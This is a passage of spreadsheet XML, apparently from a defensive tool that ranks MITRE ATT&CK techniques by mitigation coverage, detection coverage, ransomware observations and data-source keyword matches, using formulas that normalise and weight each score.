        <f t="array" ref="AL248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC248)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM248" s="25">
        <f>IF(AL248="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN248" s="52">
        <v>1</v>
      </c>
      <c r="AO248" s="51">
        <v>1</v>
      </c>
      <c r="AP248" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.1333333333333332E-2</v>
      </c>
      <c r="AQ248" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12666666666666668</v>
      </c>
      <c r="AR248" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12666666666666668</v>
      </c>
      <c r="AS248" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT248" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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49" spans="1:47" ht="32.1">
      <c r="A249" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.142857142857143E-2</v>
      </c>
      <c r="B249" s="25">
        <f>SUM(H249,M249,V249)*(1+SUM(AE249,AG249,AI249,AK249,AM249))</f>
        <v>0.28095238095238095</v>
      </c>
      <c r="C249" s="25" t="s">
        <v>1061</v>
      </c>
      <c r="D249" s="25" t="s">
        <v>187</v>
      </c>
      <c r="E249" s="25" t="s">
        <v>1062</v>
      </c>
      <c r="F249" s="51">
        <v>1</v>
      </c>
      <c r="G249" s="51">
        <v>1</v>
      </c>
      <c r="H249" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I249">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J249">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K249">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L249">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M249" s="25">
        <v>0</v>
      </c>
      <c r="N249" s="51">
        <v>1</v>
      </c>
      <c r="O249" s="51">
        <v>9</v>
      </c>
      <c r="P249" s="51">
        <v>1</v>
      </c>
      <c r="Q249" s="51">
        <v>5</v>
      </c>
      <c r="R249" s="52" t="s">
        <v>188</v>
      </c>
      <c r="S249" s="51">
        <v>6</v>
      </c>
      <c r="T249" s="52" t="s">
        <v>189</v>
      </c>
      <c r="U249" s="51">
        <v>5</v>
      </c>
      <c r="V249" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W249">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X249">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y249">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z249">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>16</v>
      </c>
      <c r="AA249">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.16</v>
      </c>
      <c r="AB249">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.16</v>
      </c>
      <c r="AC249" s="29" t="s">
        <v>1063</v>
      </c>
      <c r="AD249" s="25" t="str" cm="1">
        <f t="array" ref="AD249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE249" s="25">
        <f>IF(AD249="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF249" s="25" t="str" cm="1">
        <f t="array" ref="AF249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC249)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG249" s="25">
        <f>IF(AF249="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH249" s="25" t="str" cm="1">
        <f t="array" ref="AH249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI249" s="25">
        <f>IF(AH249="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ249" s="25" t="str" cm="1">
        <f t="array" ref="AJ249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK249" s="25">
        <f>IF(AJ249="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL249" s="25" t="str" cm="1">
        <f t="array" ref="AL249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM249" s="25">
        <f>IF(AL249="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN249" s="60">
        <v>1</v>
      </c>
      <c r="AO249" s="51">
        <v>1</v>
      </c>
      <c r="AP249" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.142857142857143E-2</v>
      </c>
      <c r="AQ249" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.3650793650793651E-2</v>
      </c>
      <c r="AR249" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.3650793650793651E-2</v>
      </c>
      <c r="AS249" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT249" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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50" spans="1:47">
      <c r="A250" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1803809523809526E-2</v>
      </c>
      <c r="B250" s="25">
        <f>SUM(H250,M250,V250)*(1+SUM(AE250,AG250,AI250,AK250,AM250))</f>
        <v>0.31803809523809529</v>
      </c>
      <c r="C250" s="25" t="s">
        <v>1064</v>
      </c>
      <c r="D250" s="25" t="s">
        <v>396</v>
      </c>
      <c r="E250" s="25" t="s">
        <v>1065</v>
      </c>
      <c r="F250" s="51">
        <v>1</v>
      </c>
      <c r="G250" s="51">
        <v>1</v>
      </c>
      <c r="H250" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I250">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J250">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K250">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L250">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M250" s="25">
        <v>0</v>
      </c>
      <c r="N250" s="51">
        <v>0</v>
      </c>
      <c r="O250" s="51">
        <v>0</v>
      </c>
      <c r="P250" s="51">
        <v>0</v>
      </c>
      <c r="Q250" s="51">
        <v>0</v>
      </c>
      <c r="R250" s="52" t="s">
        <v>1066</v>
      </c>
      <c r="S250" s="51">
        <v>5</v>
      </c>
      <c r="T250" s="51" t="s">
        <v>398</v>
      </c>
      <c r="U250" s="51">
        <v>14</v>
      </c>
      <c r="V250" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W250">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X250">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y250">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z250">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA250">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB250">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC250" s="29" t="s">
        <v>1067</v>
      </c>
      <c r="AD250" s="25" t="str" cm="1">
        <f t="array" ref="AD250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE250" s="25">
        <f>IF(AD250="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF250" s="25" t="str" cm="1">
        <f t="array" ref="AF250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG250" s="25">
        <f>IF(AF250="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH250" s="25" t="str" cm="1">
        <f t="array" ref="AH250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC250)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI250" s="25">
        <f>IF(AH250="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ250" s="25" t="str" cm="1">
        <f t="array" ref="AJ250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK250" s="25">
        <f>IF(AJ250="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL250" s="25" t="str" cm="1">
        <f t="array" ref="AL250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM250" s="25">
        <f>IF(AL250="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN250" s="60">
        <v>0</v>
      </c>
      <c r="AO250" s="51">
        <v>0</v>
      </c>
      <c r="AP250" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1803809523809526E-2</v>
      </c>
      <c r="AQ250" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10601269841269843</v>
      </c>
      <c r="AR250" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10601269841269843</v>
      </c>
      <c r="AS250" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT250" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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51" spans="1:47" ht="32.1">
      <c r="A251" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7366666666666673E-2</v>
      </c>
      <c r="B251" s="25">
        <f>SUM(H251,M251,V251)*(1+SUM(AE251,AG251,AI251,AK251,AM251))</f>
        <v>0.3736666666666667</v>
      </c>
      <c r="C251" s="25" t="s">
        <v>1068</v>
      </c>
      <c r="D251" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E251" s="25" t="s">
        <v>1069</v>
      </c>
      <c r="F251" s="51">
        <v>1</v>
      </c>
      <c r="G251" s="51">
        <v>1</v>
      </c>
      <c r="H251" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I251">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J251">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K251">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L251">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M251" s="25">
        <v>0</v>
      </c>
      <c r="N251" s="51">
        <v>0</v>
      </c>
      <c r="O251" s="51">
        <v>0</v>
      </c>
      <c r="P251" s="51">
        <v>0</v>
      </c>
      <c r="Q251" s="51">
        <v>0</v>
      </c>
      <c r="R251" s="52" t="s">
        <v>1070</v>
      </c>
      <c r="S251" s="51">
        <v>5</v>
      </c>
      <c r="T251" s="52" t="s">
        <v>1071</v>
      </c>
      <c r="U251" s="51">
        <v>14</v>
      </c>
      <c r="V251" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W251">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X251">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y251">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z251">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA251">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB251">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC251" s="29" t="s">
        <v>1060</v>
      </c>
      <c r="AD251" s="25" t="str" cm="1">
        <f t="array" ref="AD251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC251)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE251" s="25">
        <f>IF(AD251="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF251" s="25" t="str" cm="1">
        <f t="array" ref="AF251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC251)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG251" s="25">
        <f>IF(AF251="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH251" s="25" t="str" cm="1">
        <f t="array" ref="AH251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC251)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI251" s="25">
        <f>IF(AH251="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ251" s="25" t="str" cm="1">
        <f t="array" ref="AJ251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC251)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK251" s="25">
        <f>IF(AJ251="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL251" s="25" t="str" cm="1">
        <f t="array" ref="AL251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC251)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM251" s="25">
        <f>IF(AL251="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN251" s="52">
        <v>0</v>
      </c>
      <c r="AO251" s="51">
        <v>0</v>
      </c>
      <c r="AP251" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7366666666666673E-2</v>
      </c>
      <c r="AQ251" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12455555555555557</v>
      </c>
      <c r="AR251" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12455555555555557</v>
      </c>
      <c r="AS251" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT251" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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52" spans="1:47" ht="32.1">
      <c r="A252" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7366666666666673E-2</v>
      </c>
      <c r="B252" s="25">
        <f>SUM(H252,M252,V252)*(1+SUM(AE252,AG252,AI252,AK252,AM252))</f>
        <v>0.3736666666666667</v>
      </c>
      <c r="C252" s="25" t="s">
        <v>1072</v>
      </c>
      <c r="D252" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E252" s="25" t="s">
        <v>1073</v>
      </c>
      <c r="F252" s="51">
        <v>1</v>
      </c>
      <c r="G252" s="51">
        <v>1</v>
      </c>
      <c r="H252" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I252">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J252">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K252">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L252">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M252" s="25">
        <v>0</v>
      </c>
      <c r="N252" s="51">
        <v>0</v>
      </c>
      <c r="O252" s="51">
        <v>0</v>
      </c>
      <c r="P252" s="51">
        <v>0</v>
      </c>
      <c r="Q252" s="51">
        <v>0</v>
      </c>
      <c r="R252" s="51" t="s">
        <v>1074</v>
      </c>
      <c r="S252" s="51">
        <v>8</v>
      </c>
      <c r="T252" s="52" t="s">
        <v>1075</v>
      </c>
      <c r="U252" s="51">
        <v>11</v>
      </c>
      <c r="V252" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W252">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X252">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y252">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z252">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA252">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB252">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC252" s="29" t="s">
        <v>1076</v>
      </c>
      <c r="AD252" s="25" t="str" cm="1">
        <f t="array" ref="AD252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC252)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE252" s="25">
        <f>IF(AD252="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF252" s="25" t="str" cm="1">
        <f t="array" ref="AF252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC252)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG252" s="25">
        <f>IF(AF252="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH252" s="25" t="str" cm="1">
        <f t="array" ref="AH252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC252)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI252" s="25">
        <f>IF(AH252="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ252" s="25" t="str" cm="1">
        <f t="array" ref="AJ252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC252)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK252" s="25">
        <f>IF(AJ252="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL252" s="25" t="str" cm="1">
        <f t="array" ref="AL252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC252)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM252" s="25">
        <f>IF(AL252="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN252" s="60">
        <v>0</v>
      </c>
      <c r="AO252" s="51">
        <v>0</v>
      </c>
      <c r="AP252" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7366666666666673E-2</v>
      </c>
      <c r="AQ252" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12455555555555557</v>
      </c>
      <c r="AR252" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12455555555555557</v>
      </c>
      <c r="AS252" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT252" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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53" spans="1:47" ht="48">
      <c r="A253" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1803809523809526E-2</v>
      </c>
      <c r="B253" s="25">
        <f>SUM(H253,M253,V253)*(1+SUM(AE253,AG253,AI253,AK253,AM253))</f>
        <v>0.31803809523809529</v>
      </c>
      <c r="C253" s="25" t="s">
        <v>1077</v>
      </c>
      <c r="D253" s="25" t="s">
        <v>1046</v>
      </c>
